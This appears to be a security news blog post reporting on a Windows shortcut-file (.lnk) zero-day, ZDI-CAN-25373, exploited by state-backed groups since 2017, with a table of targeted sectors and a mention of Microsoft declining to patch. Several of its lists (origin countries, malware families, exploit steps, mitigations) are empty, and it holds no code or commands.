search

LEMON BLOG

Zero-Day Windows Shortcut Exploit Used by State-Backed Hackers Since 2017

A newly disclosed zero-day vulnerability in Windows shortcut files (.lnk) has been exploited in-the-wild for several years by state-sponsored hacking groups. Identified as ZDI-CAN-25373, the flaw allows attackers to silently execute malicious commands using shortcut files—making it difficult to detect through traditional security tools.

Security researchers revealed that this vulnerability has been abused since at least 2017 by advanced persistent threat (APT) groups linked to 11 different countries. 

Threat Details

The exploit revolves around manipulated .lnk files, commonly used in Windows systems. Over 1,000 weaponized shortcut files have been uncovered globally. The attackers primarily use this method for cyber espionage and data theft.

Among the nations identified as origin points are:

Targeted Sectors (Top Attack Areas) 

Sector ​% of Attacks
​Government ​22.8%
​Private Sector​14%
Financial, Think Tanks, Telco, Military, Energy (each)​8.77%
​Cryptocurrency​5.26%
​Education, Healthcare, Media (each)​3.51%
​Critical Infrastructure, Nuclear​1.75%

These figures show broad and strategic targeting, with a focus on sectors tied to national security, economic stability, and intellectual property.

Malware Families and Tools Used

Attackers leveraging ZDI-CAN-25373 deployed a wide range of malware, including:

These payloads enable persistent access, data theft, and in some cases, ransomware deployment.

How the Exploit Works

The attack method is stealthy and sophisticated:

Despite a submitted proof-of-concept (PoC), Microsoft declined to patch the vulnerability, stating it doesn't meet its remediation criteria. This leaves defenders to rely on alternative protection methods.

4. Recommended Mitigations and Workarounds

Since no official patch exists, organizations must act proactively. Recommended best practices include:

Conclusion

The exploitation of ZDI-CAN-25373 by state-backed actors underscores the growing sophistication of modern cyber threats. Without a patch from Microsoft, it's essential for organizations to take defensive measures, improve visibility, and adopt a proactive threat-hunting approach.

This vulnerability serves as a stark reminder that non-executable file types like .lnk files can pose serious threats—especially when leveraged by nation-state actors for espionage and data exfiltration.

Carousell Rolls Out Buyer Magnet Feature with No U...
AI in Software Development: Beyond Code Generation...

Related Posts

 

Comments

No comments made yet. Be the first to submit a comment
Guest
Thursday, 03 April 2025

Captcha Image

QUICK ACCESS

 LEMON Blog Articles

 LEMON Services

LEMON Web-Games

LEMON Web-Apps